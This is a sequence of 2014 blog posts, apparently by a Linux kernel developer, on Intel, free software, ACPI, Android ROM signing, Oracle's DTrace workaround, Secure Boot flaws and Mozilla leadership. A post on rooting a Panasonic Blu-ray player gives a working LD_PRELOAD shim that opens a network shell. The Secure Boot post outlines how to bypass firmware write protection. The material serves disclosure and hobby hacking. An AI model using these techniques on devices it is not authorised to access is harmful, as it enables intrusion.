2014-10-02 09:20 am

Actions have consequences (or: why I'm not fixing Intel's bugs any more)

A lot of the kernel work I've ended up doing has involved dealing with bugs on Intel-based systems - figuring out interactions between their hardware and firmware, reverse engineering features that they refuse to document, improving their power management support, handling platform integration stuff for their GPUs and so on. Some of this I've been paid for, but a bunch has been unpaid work in my spare time[1].

Recently, as part of the anti-women #GamerGate campaign[2], a set of awful humans convinced Intel to terminate an advertising campaign because the site hosting the campaign had dared to suggest that the sexism present throughout the gaming industry might be a problem. Despite being awful humans, they are absolutely within their rights to request that a company choose to spend its money in a different way. And despite it being a dreadful decision, Intel is obviously entitled to spend their money as they wish. But I'm also free to spend my unpaid spare time as I wish, and I no longer wish to spend it doing unpaid work to enable an abhorrently-behaving company to sell more hardware. I won't be working on any Intel-specific bugs. I won't be reverse engineering any Intel-based features[3]. If the backlight on your laptop with an Intel GPU doesn't work, the number of fucks I'll be giving will fail to register on even the most sensitive measuring device.

On the plus side, this is probably going to significantly reduce my gin consumption.

[1] In the spirit of full disclosure: in some cases this has resulted in me being sent laptops in order to figure stuff out, and I was not always asked to return those laptops. My current laptop was purchased by me.

[2] I appreciate that there are some people involved in this campaign who earnestly believe that they are working to improve the state of professional ethics in games media. That is a worthy goal! But you're allying yourself to a cause that disproportionately attacks women while ignoring almost every other conflict of interest in the industry. If this is what you care about, find a new way to do it - and perhaps deal with the rather more obvious cases involving giant corporations, rather than obsessing over indie developers.

For avoidance of doubt, any comments arguing this point will be replaced with the phrase "Fart fart fart".

[3] Except for the purposes of finding entertaining security bugs
2014-09-23 11:08 pm

My free software will respect users or it will be bullshit

I had dinner with a friend this evening and ended up discussing the FSF's four freedoms. The fundamental premise of the discussion was that the freedoms guaranteed by free software are largely academic unless you fall into one of two categories - someone who is sufficiently skilled in the arts of software development to examine and modify software to meet their own needs, or someone who is sufficiently privileged[1] to be able to encourage developers to modify the software to meet their needs.

The problem is that most people don't fall into either of these categories, and so the benefits of free software are often largely theoretical to them. Concentrating on philosophical freedoms without considering whether these freedoms provide meaningful benefits to most users risks these freedoms being perceived as abstract ideals, divorced from the real world - nice to have, but fundamentally not important. How can we tie these freedoms to issues that affect users on a daily basis?

In the past the answer would probably have been along the lines of "Free software inherently respects users", but reality has pretty clearly disproven that. Unity is free software that is fundamentally designed to tie the user into services that provide financial benefit to Canonical, with user privacy as a secondary concern. Despite Android largely being free software, many users are left with phones that no longer receive security updates[2]. Textsecure is free software but the author requests that builds not be uploaded to third party app stores because there's no meaningful way for users to verify that the code has not been modified - and there's a direct incentive for hostile actors to modify the software in order to circumvent the security of messages sent via it.

We're left in an awkward situation. Free software is fundamental to providing user privacy. The ability for third parties to continue providing security updates is vital for ensuring user safety. But in the real world, we are failing to make this argument - the freedoms we provide are largely theoretical for most users. The nominal security and privacy benefits we provide frequently don't make it to the real world. If users do wish to take advantage of the four freedoms, they frequently do so at a potential cost of security and privacy. Our focus on the four freedoms may be coming at a cost to the pragmatic freedoms that our users desire - the freedom to be free of surveillance (be that government or corporate), the freedom to receive security updates without having to purchase new hardware on a regular basis, the freedom to choose to run free software without having to give up basic safety features.

That's why projects like the GNOME safety and privacy team are so important. This is an example of tying the four freedoms to real-world user benefits, demonstrating that free software can be written and managed in such a way that it actually makes life better for the average user. Designing code so that users are fundamentally in control of any privacy tradeoffs they make is critical to empowering users to make informed decisions. Committing to meaningful audits of all network transmissions to ensure they don't leak personal data is vital in demonstrating that developers fundamentally respect the rights of those users. Working on designing security measures that make it difficult for a user to be tricked into handing over access to private data is going to be a necessary precaution against hostile actors, and getting it wrong is going to ruin lives.

The four freedoms are only meaningful if they result in real-world benefits to the entire population, not a privileged minority. If your approach to releasing free software is merely to ensure that it has an approved license and throw it over the wall, you're doing it wrong. We need to design software from the ground up in such a way that those freedoms provide immediate and real benefits to our users. Anything else is a failure.

(title courtesy of My Feminism will be Intersectional or it will be Bullshit by Flavia Dzodan. While I'm less angry, I'm solidly convinced that free software that does nothing to respect or empower users is an absolute waste of time)

[1] Either in the sense of having enough money that you can simply pay, having enough background in the field that you can file meaningful bug reports or having enough followers on Twitter that simply complaining about something results in people fixing it for you

[2] The free software nature of Android often makes it possible for users to receive security updates from a third party, but this is not always the case. Free software makes this kind of support more likely, but it is in no way guaranteed.
2014-09-16 02:03 pm

ACPI, kernels and contracts with firmware

ACPI is a complicated specification - the latest version is 980 pages long. But that's because it's trying to define something complicated: an entire interface for abstracting away hardware details and making it easier for an unmodified OS to boot diverse platforms.

Inevitably, though, it can't define the full behaviour of an ACPI system. It doesn't explicitly state what should happen if you violate the spec, for instance. Obviously, in a just and fair world, no systems would violate the spec. But in the grim meathook future that we actually inhabit, systems do. We lack the technology to go back in time and retroactively prevent this, and so we're forced to deal with making these systems work.

This ends up being a pain in the neck in the x86 world, but it could be much worse. Way back in 2008 I wrote something about why the Linux kernel reports itself to firmware as "Windows" but refuses to identify itself as Linux. The short version is that "Linux" doesn't actually identify the behaviour of the kernel in a meaningful way. "Linux" doesn't tell you whether the kernel can deal with buffers being passed when the spec says it should be a package. "Linux" doesn't tell you whether the OS knows how to deal with an HPET. "Linux" doesn't tell you whether the OS can reinitialise graphics hardware.

Back then I was writing from the perspective of the firmware changing its behaviour in response to the OS, but it turns out that it's also relevant from the perspective of the OS changing its behaviour in response to the firmware. Windows 8 handles backlights differently to older versions. Firmware that's intended to support Windows 8 may expect this behaviour. If the OS tells the firmware that it's compatible with Windows 8, the OS has to behave compatibly with Windows 8.

In essence, if the firmware asks for Windows 8 support and the OS says yes, the OS is forming a contract with the firmware that it will behave in a specific way. If Windows 8 allows certain spec violations, the OS must permit those violations. If Windows 8 makes certain ACPI calls in a certain order, the OS must make those calls in the same order. Any firmware bug that is triggered by the OS not behaving identically to Windows 8 must be dealt with by modifying the OS to behave like Windows 8.

This sounds horrifying, but it's actually important. The existence of well-defined[1] OS behaviours means that the industry has something to target. Vendors test their hardware against Windows, and because Windows has consistent behaviour within a version[2] the vendors know that their machines won't suddenly stop working after an update. Linux benefits from this because we know that we can make hardware work as long as we're compatible with the Windows behaviour.

That's fine for x86. But remember when I said it could be worse? What if there were a platform that Microsoft weren't targeting? A platform where Linux was the dominant OS? A platform where vendors all test their hardware against Linux and expect it to have a consistent ACPI implementation?

Our even grimmer meathook future welcomes ARM to the ACPI world.

Software development is hard, and firmware development is software development with worse compilers. Firmware is inevitably going to rely on undefined behaviour. It's going to make assumptions about ordering. It's going to mishandle some cases. And it's the operating system's job to handle that. On x86 we know that systems are tested against Windows, and so we simply implement that behaviour. On ARM, we don't have that convenient reference. We are the reference. And that means that systems will end up accidentally depending on Linux-specific behaviour. Which means that if we ever change that behaviour, those systems will break.

So far we've resisted calls for Linux to provide a contract to the firmware in the way that Windows does, simply because there's been no need to - we can just implement the same contract as Windows. How are we going to manage this on ARM? The worst case scenario is that a system is tested against, say, Linux 3.19 and works fine. We make a change in 3.21 that breaks this system, but nobody notices at the time. Another system is tested against 3.21 and works fine. A few months later somebody finally notices that 3.21 broke their system and the change gets reverted, but oh no! Reverting it breaks the other system. What do we do now? The systems aren't telling us which behaviour they expect, so we're left with the prospect of adding machine-specific quirks. This isn't scalable.

Supporting ACPI on ARM means developing a sense of discipline around ACPI development that we simply haven't had so far. If we want to avoid breaking systems we have two options:

1) Commit to never modifying the ACPI behaviour of Linux.
2) Expose an interface that indicates which well-defined ACPI behaviour a specific kernel implements, and bump that whenever an incompatible change is made. Backward compatibility paths will be required if firmware only supports an older interface. (A rough sketch of this appears below.)
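
One way to picture option (2) is for the kernel to answer _OSI queries for versioned behaviour strings, only ever appending to the list it claims. Everything in this sketch - the string format, the names - is hypothetical rather than an existing kernel interface:

#include <linux/kernel.h>
#include <linux/string.h>
#include <linux/types.h>

/* Hypothetical interface, not existing kernel code: the list of ACPI
 * behaviour revisions this kernel implements. A new entry is appended
 * whenever an incompatible change is made and old entries are never
 * removed, so firmware validated against an older revision keeps
 * getting a "yes". */
static const char * const linux_acpi_behaviour[] = {
        "Linux-ACPI-Behaviour-1",       /* e.g. the 3.19-era behaviour */
        "Linux-ACPI-Behaviour-2",       /* bumped by the incompatible 3.21 change */
};

static bool linux_acpi_behaviour_osi(const char *interface)
{
        int i;

        for (i = 0; i < ARRAY_SIZE(linux_acpi_behaviour); i++)
                if (!strcmp(interface, linux_acpi_behaviour[i]))
                        return true;
        return false;
}

Firmware could then key any behaviour-sensitive code off the newest revision it was validated against, in the same way that Windows-targeted firmware keys off _OSI("Windows 2009") and friends.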

(1) is unlikely to be practical, but (2) isn't a great deal easier. Somebody is going to need to take responsibility for tracking ACPI behaviour and incrementing the exported interface whenever it changes, and we need to know who that's going to be before any of these systems start shipping. The alternative is a sea of ARM devices that only run specific kernel versions, which is exactly the scenario that ACPI was supposed to be fixing.

[1] Defined by implementation, not defined by specification
[2] Windows may change behaviour between versions, but always adds a new _OSI string when it does so. It can then modify its behaviour depending on whether the firmware knows about later versions of Windows.
2014-08-11 12:43 am

Birthplace

For tedious reasons, I will at this stage point out that I was born in Galway, Ireland.
2014-07-04 05:40 pm

Self-signing custom Android ROMs

The security model on the Google Nexus devices is pretty straightforward. The OS is (nominally) secure and prevents anything from accessing the raw MTD devices. The bootloader will only allow the user to write to partitions if it's unlocked. The recovery image will only permit you to install images that are signed with a trusted key. In combination, these facts mean that it's impossible for an attacker to modify the OS image without unlocking the bootloader[1], and unlocking the bootloader wipes all your data. You'll probably notice that.

The problem comes when you want to run something other than the stock Google images. Step number one for basically all of these is "Unlock your bootloader", which is fair enough. Step number two is "Install a new recovery image", which is also reasonable in that the key database is stored in the recovery image and so there's no way to update it without doing so. Except, unfortunately, basically every third party Android image is either unsigned or is signed with the (publicly available) Android test keys, so this new recovery image will flash anything. Feel free to relock your bootloader - the recovery image will still happily overwrite your OS.

This is unfortunate. Even if you've encrypted your phone, anyone with physical access can simply reboot into recovery and reflash /system with something that'll stash your encryption key and mail your data to the NSA. Surely there's a better way of doing this?

Thankfully, there is. Kind of. It's annoying and involves a bunch of manual processes and you'll need to re-sign every update yourself. But it is possible to configure Nexus devices in such a way that you retain the same level of security you had when you were using the Google keys without losing the freedom to run whatever you want. Here's how.

Note: This is not straightforward. If you're not an experienced developer, you shouldn't attempt this. I'm documenting this so people can create more user-friendly approaches.

First: Unlock your bootloader. /data will be wiped.
Second: Get a copy of the stock recovery.img for your device. You can get it from the factory images available here
Third: Grab mkbootimg from here and build it. Run unpackbootimg against recovery.img.
Fourth: Generate some keys. Get this script and run it.
Fifth: zcat recovery.img-ramdisk.gz | cpio -id to extract your recovery image ramdisk. Do this in an otherwise empty directory.
Sixth: Get DumpPublicKey.java from here and run it against the .x509.pem file generated in step 4. Replace /res/keys from the recovery image ramdisk with the output. Include the "v2" bit at the beginning.
Seventh: Repack the ramdisk image (find . | cpio -o -H newc | gzip > ../recovery.img-ramdisk.gz) and rebuild recovery.img with mkbootimg.
Eighth: Write the new recovery image to your device
Ninth: Get signapk from here and build it. Run it against the ROM you want to sign, using the keys you generated earlier. Make sure you use the -w option to sign the whole zip rather than signing individual files.
Tenth: Relock your bootloader
Eleventh: Boot into recovery mode and sideload your newly signed image.

At this point you'll want to set a reasonable security policy on the image (eg, if it grants root access, ensure that it requires a PIN or something), but otherwise you're set - the recovery image can't be overwritten without unlocking the bootloader and wiping all your data, and the recovery image will only write images that are signed with your key. For obvious reasons, keep the key safe.

This, well. It's obviously an excessively convoluted workflow. A *lot* of it could be avoided by providing a standardised mechanism for key management. One approach would be to add a new fastboot command for modifying the key database, and only permit this to be run when the bootloader is unlocked. The workflow would then be something like
  • Unlock bootloader
  • Generate keys
  • Install new key
  • Lock bootloader
  • Sign image
  • Install image
which seems more straightforward. Long term, individual projects could do the signing themselves and distribute their public keys, resulting in the install process becoming as easy as
  • Unlock bootloader
  • Install ROM key
  • Lock bootloader
  • Install ROM
which is actually easier than the current requirement to install an entirely new recovery image.

I'd actually previously criticised Google on the grounds that using custom keys wasn't possible on Android devices. I was wrong. It is, it's just that (as far as I can tell) nobody's actually documented it before. It's important that users not be forced into treating security and freedom as mutually exclusive, and it's great that Google have made that possible.

[1] This model fails if it's possible to gain root on the device. Thankfully this would never hold on what's that over there is that a distraction?
2014-05-18 10:53 pm

The desktop and the developer

I was at the OpenStack Summit this week. The overwhelming majority of OpenStack deployments are Linux-based, yet the most popular laptop vendor (by a long way) at the conference was Apple. People are writing code with the intention of deploying it on Linux, but they're doing so under an entirely different OS.

But what's really interesting is the tools they're using to do so. When I looked over people's shoulders, I saw terminals and a web browser. They're not using Macs because their development tools require them, they're using Macs because of what else they get - an aesthetically pleasing OS, iTunes and what's easily the best trackpad hardware/driver combination on the market. These are people who work on the same laptop that they use at home. They'll use it when they're commuting, either for playing videos or for getting a head start so they can leave early. They use an Apple because they don't want to use different hardware for work and pleasure.

The developers I was surrounded by aren't the same developers you'd find at a technical conference 10 years ago. They grew up in an era that's become increasingly focused on user experience, and the idea of migrating to Linux because it's more tweakable is no longer appealing. People who spend their working day making use of free software (and in many cases even contributing or maintaining free software) won't run a free software OS because doing so would require them to compromise on things that they care about. Linux would give them the same terminals and web browser, but Linux's poorer multitouch handling is enough on its own to disrupt their workflow. Moving to Linux would slow them down.

But even if we fixed all those things, why would somebody migrate? The best we'd be offering is a comparable experience with the added freedom to modify more of their software. We can probably assume that this isn't a hugely compelling advantage, because otherwise it'd probably be enough to overcome some of the functional disparity. Perhaps we need to be looking at this differently.

When we've been talking about developer experience we've tended to talk about the experience of people who are writing software targeted at our desktops, not people who are incidentally using Linux to do their development. These people don't need better API documentation. They don't need a nicer IDE. They need a desktop environment that gives them access to the services that they use on a daily basis. Right now if someone opens an issue against one of their projects, they'll get an email. They'll have to click through that in order to get to a webpage that lets them indicate that they've accepted the bug. If they know that the bug's already fixed in another branch, they'll probably need to switch to github in order to find the commit that contains the bug number that fixed it, switch back to their issue tracker and then paste that in and mark it as a duplicate. It's tedious. It's annoying. It's distracting.

If the desktop had built-in awareness of the issue tracker then they could be presented with relevant information and options without having to click through two separate applications. If git commits were locally indexed, the developer could find the relevant commit without having to move back to a web browser or open a new terminal to find the local checkout. A simple task that currently involves multiple context switches could be made significantly faster.

That's a simple example. The problem goes deeper. The use of web services for managing various parts of the development process removes the need for companies to maintain their own infrastructure, but in the process it tends to force developers to bounce between multiple websites that have different UIs and no straightforward means of sharing information. Time is lost to this. It makes developers unhappy.

A combination of improved desktop polish and spending effort on optimising developer workflows would stand a real chance of luring these developers away from OS X with the promise that they'd spend less time fighting web browsers, leaving them more time to get on with development. It would also help differentiate Linux from proprietary alternatives - Apple and Microsoft may spend significant amounts of effort on improving developer tooling, but they're mostly doing so for developers who are targeting their platforms. A desktop environment that made it easier to perform generic development would be a unique selling point.

I spoke to various people about this during the Summit, and it was heartening to hear that there are people who are already thinking about this and hoping to improve things. I'm looking forward to that, but I also hope that there'll be wider interest in figuring out how we can make things easier for developers without compromising other users. It seems like an interesting challenge.
2014-05-11 11:14 am

Oracle continue to circumvent EXPORT_SYMBOL_GPL()

Oracle won their appeal regarding whether APIs are copyrightable. There'll be ongoing argument about whether Google's use of those APIs is fair use or not, and perhaps an appeal to the Supreme Court, but that's the new status quo. This will doubtless result in arguments over whether Oracle's implementation of Linux APIs in Solaris 10 was a violation of copyright or not (and presumably Google are currently checking whether they own any code that Oracle reimplemented), but that's not what I'm going to talk about today.

Oracle own some code called DTrace (Wikipedia has a good overview here - what it actually does isn't especially relevant) that was originally written as part of Solaris. When Solaris was released under the CDDL, so was DTrace. The CDDL is a file-level copyleft license with some restrictions not present in the GPL - as a result, combining GPLed code with CDDLed code will (in the absence of additional permission grants) result in a work that is under an inconsistent license and cannot legally be distributed.

Oracle wanted to make DTrace available for Linux as part of their Unbreakable Linux product. Integrating it directly into the kernel would obviously cause legal issues, so instead they implemented it as a kernel module. The copyright status of kernel modules is somewhat unclear. The GPL covers derivative works, but the definition of derivative works is a function of copyright law and judges. Making use of explicitly exported API may not be sufficient to constitute a derivative work - on the other hand, it might. This is largely untested in court. Oracle appear to believe that they're legitimate, and so have added just enough in-kernel code (and GPLed) to support DTrace, while keeping the CDDLed core of DTrace separate.

The kernel actually has two levels of exposed (non-userspace) API - those exported via EXPORT_SYMBOL() and those exported via EXPORT_SYMBOL_GPL(). Symbols exported via EXPORT_SYMBOL_GPL() may only be used by modules that claim to be GPLed, with the kernel refusing to load them otherwise. There is no technical limitation on the use of symbols exported via EXPORT_SYMBOL().

(Aside: this should not be interpreted as meaning that modules that only use symbols exported via EXPORT_SYMBOL() will not be considered derivative works. Anything exported via EXPORT_SYMBOL_GPL() is considered by the author to be so fundamental to the kernel that using it would be impossible without creating a derivative work. Using something exported via EXPORT_SYMBOL() may result in the creation of a derivative work. Consult lawyers before attempting to release a non-GPLed Linux kernel module)

DTrace integrates very tightly with the host kernel, and one of the things it needs access to is a high-resolution timer that is guaranteed to monotonically increase. Linux provides one in the form of ktime_get(). Unfortunately for Oracle, ktime_get() is only exported via EXPORT_SYMBOL_GPL(). Attempting to call it directly from the DTrace module would fail.

Oracle work around this in their (GPLed) kernel abstraction code. A function called dtrace_gethrtimer() simply returns the value of ktime_get(). dtrace_gethrtimer() is exported via EXPORT_SYMBOL() and therefore can be called from the DTrace module.
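
The wrapper pattern being described is small enough to sketch in full. This is an illustration of the general technique following the names used above, not Oracle's actual source, and the exact headers needed vary between kernel versions:

#include <linux/module.h>
#include <linux/ktime.h>

/* GPL-licensed shim, as described above (not Oracle's actual code):
 * take the value of a GPL-only symbol and re-export it via a plain
 * EXPORT_SYMBOL(), where a non-GPL module can reach it. */
ktime_t dtrace_gethrtimer(void)
{
        return ktime_get();     /* ktime_get() itself is EXPORT_SYMBOL_GPL() */
}
EXPORT_SYMBOL(dtrace_gethrtimer);

MODULE_LICENSE("GPL");

The kernel's licence check only looks at the declared license of the module resolving the symbol, so the shim loads happily and the CDDLed module simply calls dtrace_gethrtimer() instead.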

So, in the face of a technical mechanism designed to enforce the author's beliefs about the copyright status of callers of this function, Oracle deliberately circumvent that technical mechanism by simply re-exporting the same function under a new name. It should be emphasised that calling an EXPORT_SYMBOL_GPL() function does not inherently cause the caller to become a derivative work of the kernel - it only represents the original author's opinion of whether it would. You'd still need a court case to find out for sure. But if it turns out that the use of ktime_get() does cause a work to become derivative, Oracle would find it fairly difficult to argue that their infringement was accidental.

Of course, as copyright holders of DTrace, Oracle could solve the problem by dual-licensing DTrace under the GPL as well as the CDDL. The fact that they haven't implies that they think there's enough value in keeping it under an incompatible license to risk losing a copyright infringement suit. This might be just the kind of recklessness that Oracle accused Google of back in their last case.
2014-04-20 07:39 pm

Home entertainment implementations are pretty appalling

I picked up a Panasonic BDT-230 a couple of months ago. Then I discovered that even though it appeared fairly straightforward to make it DVD region free (I have a large pile of PAL region 2 DVDs), the US models refuse to play back PAL content. We live in an era of software-defined functionality. While Panasonic could have designed a separate hardware SKU with a hard block on PAL output, that would seem like unnecessary expense. So, playing with the firmware seemed like a reasonable start.

Panasonic provide a nice download site for firmware updates, so I grabbed the most recent and set to work. Binwalk found a squashfs filesystem, which was a good sign. Less good was the block at the end of the firmware with "RSA" written around it in large letters. The simple approach of hacking the firmware, building a new image and flashing it to the device didn't appear likely to work.

Which left dealing with the installed software. The BDT-230 is based on a Mediatek chipset, and like most (all?) Mediatek systems runs a large binary called "bdpprog" that spawns about eleventy billion threads and does pretty much everything. Running strings over that showed, well, rather a lot, but most promisingly included a reference to "/mnt/sda1/vudu/vudu.sh". Other references to /mnt/sda1 made it pretty clear that it was the mount point for USB mass storage. There were a couple of other constraints that had to be satisfied, but soon attempting to run Vudu was actually setting a blank root password and launching telnetd.

/acfg/config_file_global.txt was the next stop. This is a set of tokens and values with useful looking names like "IDX_GB_PTT_COUNTRYCODE". I tried changing the values, but unfortunately made a poor guess - on next reboot, the player had reset itself to DVD region 5, Blu Ray region C and was talking to me in Russian. More inconveniently, the Vudu icon had vanished and I couldn't launch a shell any more.

But where there's one obvious mechanism for running arbitrary code, there's probably another. /usr/local/bin/browser.sh contained the wonderful line:
export LD_PRELOAD=/mnt/sda1/bbb/libSegFault.so
, so then it was just a matter of building a library that hooked open() and launched inetd and dropping that into the right place, and then opening the browser.
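
To make it concrete, a shim along these lines only takes a few lines of C. This is an illustrative reconstruction rather than the actual library - the inetd path and the build command are assumptions:

/* Illustrative reconstruction - build with something like:
 *   gcc -shared -fPIC -o libSegFault.so hook.c -ldl
 * The inetd path below is an assumption. */
#define _GNU_SOURCE
#include <dlfcn.h>
#include <fcntl.h>
#include <stdarg.h>
#include <stdlib.h>
#include <sys/types.h>

static int (*real_open)(const char *, int, ...);

int open(const char *path, int flags, ...)
{
        static int spawned;
        mode_t mode = 0;
        va_list ap;

        if (!real_open)
                real_open = dlsym(RTLD_NEXT, "open");

        /* First call: start a network listener, then get out of the way */
        if (!spawned) {
                spawned = 1;
                system("/usr/sbin/inetd");
        }

        va_start(ap, flags);
        if (flags & O_CREAT)
                mode = va_arg(ap, mode_t);
        va_end(ap);

        return real_open(path, flags, mode);
}

Dropped onto the USB stick under the path browser.sh expects, the browser's environment does the rest.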

This time I set the country code correctly, rebooted and now I can actually watch Monkey Dust again. Hurrah! But, at the same time, concerning. This software has been written without any concern for security, and it listens on the network by default. If it took me this little time to find two entirely independent ways to run arbitrary code on the device, it doesn't seem like a stretch to believe that there are probably other vulnerabilities that can be exploited with less need for physical access.

The depressing part of this is that there's no reason to believe that Panasonic are especially bad here - especially since a large number of vendors are shipping much the same Mediatek code, and so probably have similar (if not identical) issues. The future is made up of network-connected appliances that are using your electricity to mine somebody else's Dogecoin. Our nightmarish dystopia may be stranger than expected.
2014-04-13 09:43 pm

Real-world Secure Boot attacks

MITRE gave a presentation on UEFI Secure Boot at SyScan earlier this month. You should read the presentation and paper, because it's really very good.

It describes a couple of attacks. The first is that some platforms store their Secure Boot policy in a run time UEFI variable. UEFI variables are split into two broad categories - boot time and run time. Boot time variables can only be accessed while in boot services - the moment the bootloader or kernel calls ExitBootServices(), they're inaccessible. Some vendors chose to leave the variable containing firmware settings available during run time, presumably because it makes it easier to implement tools for modifying firmware settings at the OS level. Unfortunately, some vendors left bits of Secure Boot policy in this space. The naive approach would be to simply disable Secure Boot entirely, but that means that the OS would be able to detect that the system wasn't in a secure state[1]. A more subtle approach is to modify the policy, such that the firmware chooses not to verify the signatures on files stored on fixed media. Drop in a new bootloader and victory is ensured.

But that's not a beautiful approach. It depends on the firmware vendor having made that mistake. What if you could just rewrite arbitrary variables, even if they're only supposed to be accessible in boot services? Variables are all stored in flash, connected to the chipset's SPI controller. Allowing arbitrary access to that from the OS would make it straightforward to modify the variables, even if they're boot time-only. So, thankfully, the SPI controller has some control mechanisms. The first is that any attempt to enable the write-access bit will cause a System Management Interrupt, at which point the CPU should trap into System Management Mode and (if the write attempt isn't authorised) flip it back. The second is to disable access from the OS entirely - all writes have to take place in System Management Mode.

The MITRE results show that around 0.03% of modern machines enable the second option. That's unfortunate, but the first option should still be sufficient[2]. Except the first option relies on the SMI actually firing. And, conveniently, Intel's chipsets have a bit that allows you to disable all SMI sources[3], and then have another bit to disable further writes to the first bit. Except 40% of the machines MITRE tested didn't bother setting that lock bit. So you can just disable SMI generation, remove the write-protect bit on the SPI controller and then write to arbitrary variables, including the SecureBoot enable one.
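
The relevant write-protection bits are easy enough to inspect from a running system. The sketch below reads the BIOS control register of the LPC bridge, which carries the write-enable bit, the SMI-on-write-enable bit and the SMM-only-writes bit - the 0xDC offset and bit positions are assumptions that hold for many Intel ICH/PCH-era chipsets, and a tool like chipsec checks this (and the SMI lock bit) far more thoroughly:

#include <stdint.h>
#include <stdio.h>
#include <sys/io.h>

int main(void)
{
        uint32_t bc;

        if (iopl(3)) {
                perror("iopl");
                return 1;
        }

        /* BIOS_CNTL lives at offset 0xDC in the config space of the LPC
         * bridge (bus 0, device 31, function 0) on many Intel ICH/PCH
         * chipsets - an assumption, not something to rely on blindly */
        outl(0x80000000 | (31 << 11) | 0xDC, 0xCF8);
        bc = inl(0xCFC);

        printf("BIOSWE  (flash writes currently enabled): %d\n", !!(bc & 0x01));
        printf("BLE     (SMI raised on write-enable):     %d\n", !!(bc & 0x02));
        printf("SMM_BWP (writes only allowed from SMM):   %d\n", !!(bc & 0x20));
        return 0;
}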

This is, uh, obviously a problem. The good news is that this has been communicated to firmware and system vendors and it should be fixed in the future. The bad news is that a significant proportion of existing systems can probably have their Secure Boot implementation circumvented. This is pretty unsurprising - I suggested that the first few generations would be broken back in 2012. Security tends to be an iterative process, and changing a branch of the industry that's historically not had to care into one that forms the root of platform trust is a difficult process. As the MITRE paper says, UEFI Secure Boot will be a genuine improvement in security. It's just going to take us a little while to get to the point where the more obvious flaws have been worked out.

[1] Unless the malware was intelligent enough to hook GetVariable, detect a request for SecureBoot and then give a fake answer, but who would do that?
[2] Impressively, basically everyone enables that.
[3] Great for dealing with bugs caused by YOUR ENTIRE COMPUTER BEING INTERRUPTED BY ARBITRARY VENDOR CODE, except unfortunately it also probably disables chunks of thermal management and stops various other things from working as well.
2014-04-03 03:18 pm

Mozilla and leadership

A post I wrote back in 2012 got linked from a couple of the discussions relating to Brendan Eich being appointed Mozilla CEO. The tldr version is "If members of your community don't trust their leader socially, the leader's technical competence is irrelevant". That seems to have played out here.

In terms of background[1]: in 2008, Brendan donated money to the campaign for Proposition 8, a Californian constitutional amendment that expressly defined marriage as being between one man and one woman[2]. Both before and after that he had donated money to a variety of politicians who shared many political positions, including the definition of marriage as being between one man and one woman[3].

Mozilla is an interesting organisation. It consists of the for-profit Mozilla Corporation, which is wholly owned by the non-profit Mozilla Foundation. The Corporation's bylaws require it to work to further the Foundation's goals, and any profit is reinvested in Mozilla. Mozilla developers are employed by the Corporation rather than the Foundation, and as such the CEO is responsible for ensuring that those developers are able to achieve those goals.

The Mozilla Manifesto discusses individual liberty in the context of use of the internet, not in a wider social context. Brendan's appointment was very much in line with the explicit aims of both the Foundation and the Corporation - whatever his views on marriage equality, nobody has seriously argued about his commitment to improving internet freedom. So, from that perspective, he should have been a fine choice.

But that ignores the effect on the wider community. People don't attach themselves to communities merely because of explicitly stated goals - they do so because they feel that the community is aligned with their overall aims. The Mozilla community is one of the most diverse in free software, at least in part because Mozilla's stated goals and behaviour are fairly inspirational. People who identify themselves with other movements backing individual liberties are likely to identify with Mozilla. So, unsurprisingly, there's a large number of socially progressive individuals (LGBT or otherwise) in the Mozilla community, both inside and outside the Corporation.

A CEO who's donated money to strip rights[4] from a set of humans will not be trusted by many who believe that all humans should have those rights. It's not just limited to individuals directly affected by his actions - if someone's shown that they're willing to strip rights from another minority for political or religious reasons, what's to stop them attempting to do the same to you? Even if you personally feel safe, do you trust someone who's willing to do that to your friends? In a community that's made up of many who are either LGBT or identify themselves as allies, that loss of trust is inevitably going to cause community discomfort.

The first role of a leader should be to manage that. Instead, in the first few days of Brendan's leadership, we heard nothing of substance - at best, an apology for pain being caused rather than an apology for the act that caused the pain. And then there was an interview which demonstrated remarkable tone deafness. He made no attempt to alleviate the concerns of the community. There were repeated non-sequiturs about Indonesia. It sounded like he had no idea at all why the community that he was now leading was unhappy.

And, today, he resigned. It's easy to get into hypotheticals - could he have compromised his principles for the sake of Mozilla? Would an initial discussion of the distinction between the goals of members of the Mozilla community and the goals of Mozilla itself have made this more palatable? If the board had known this would happen, would they have made the same choice - and if they didn't know, why not?

But that's not the real point. The point is that the community didn't trust Brendan, and Brendan chose to leave rather than do further harm to the community. Trustworthy leadership is important. Communities should reflect on whether their leadership reflects not only their beliefs, but the beliefs of those that they would like to join the community. Fail to do so and you'll drive them away instead.

[1] For people who've been living under a rock
[2] Proposition 8 itself was a response to an ongoing court case that, at the point of Proposition 8 being proposed, appeared likely to support the overturning of Proposition 22, an earlier Californian ballot measure that legally (rather than constitutionally) defined marriage as being between one man and one woman. Proposition 22 was overturned, and for a few months before Proposition 8 passed, gay marriage was legal in California.
[3] http://www.theguardian.com/technology/2014/apr/02/controversial-mozilla-ceo-made-donations-right-wing-candidates-brendan-eich
[4] Brendan made a donation on October 25th, 2008. This postdates the overturning of Proposition 22, and as such gay marriage was legal in California at the time of this donation. Donating to Proposition 8 at that point was not about supporting the status quo, it was about changing the constitution to forbid something that courts had found was protected by the state constitution.
2014-03-23 11:39 pm

What free software means to me

I was awarded the Free Software Foundation Award for the Advancement of Free Software this weekend[1]. I'd been given some forewarning, and I spent a bunch of that time thinking about how free software had influenced my life. It turns out that it's a lot.

I spent most of the 90s growing up in an environment that was rather more interested in cattle than in computers, and had very little internet access during that time. My entire knowledge of the wider free software community came from a couple of CDs that contained a copy of the jargon file, the source code to the entire GNU project and an early copy of the m68k Linux kernel.

But that was enough. Before I'd even got to university, I knew what free software was. I'd had the opportunity to teach myself how an operating system actually worked. I'd seen the benefits of being able to modify software and share those modifications with others. I met other people with the same interests. I ended up with a job writing free software and collaborating with others on integrating it with upstream code. And, from there, I became more and more involved with a wider range of free software communities, finding an increasing number of opportunities to help make changes that benefited both me and others.

Without free software I'd have started years later. I'd have lost the opportunity to collaborate with people spread over the entire world. My first job would have looked very different, as would my entire career since then. Without free software, almost everything I've achieved in my adult life would have been impossible.

To me, free software means I've lived a significantly better life than would otherwise have been the case. But more than that, it means doing what I can to make sure that other people have the same opportunities. I am here because of the work of others. The most rewarding part of my continued involvement is the knowledge that I am part of a countless number of people working to make sure that others can tell the same story in future.

[1] I'd link to the actual press release, but it contains possibly the worst photograph of me in the entire history of the universe
2014-03-12 03:37 pm

Dealing with Apple ACPI issues

I wrote about Thunderbolt on Apple hardware a while ago. Since then Andreas Noever has somehow managed to write a working Thunderbolt stack, which is awesome! But there was still the problem I mentioned of the device not appearing unless you passed acpi_osi="Darwin" on the kernel command line, and a further problem that if you suspended and then resumed it vanished again.

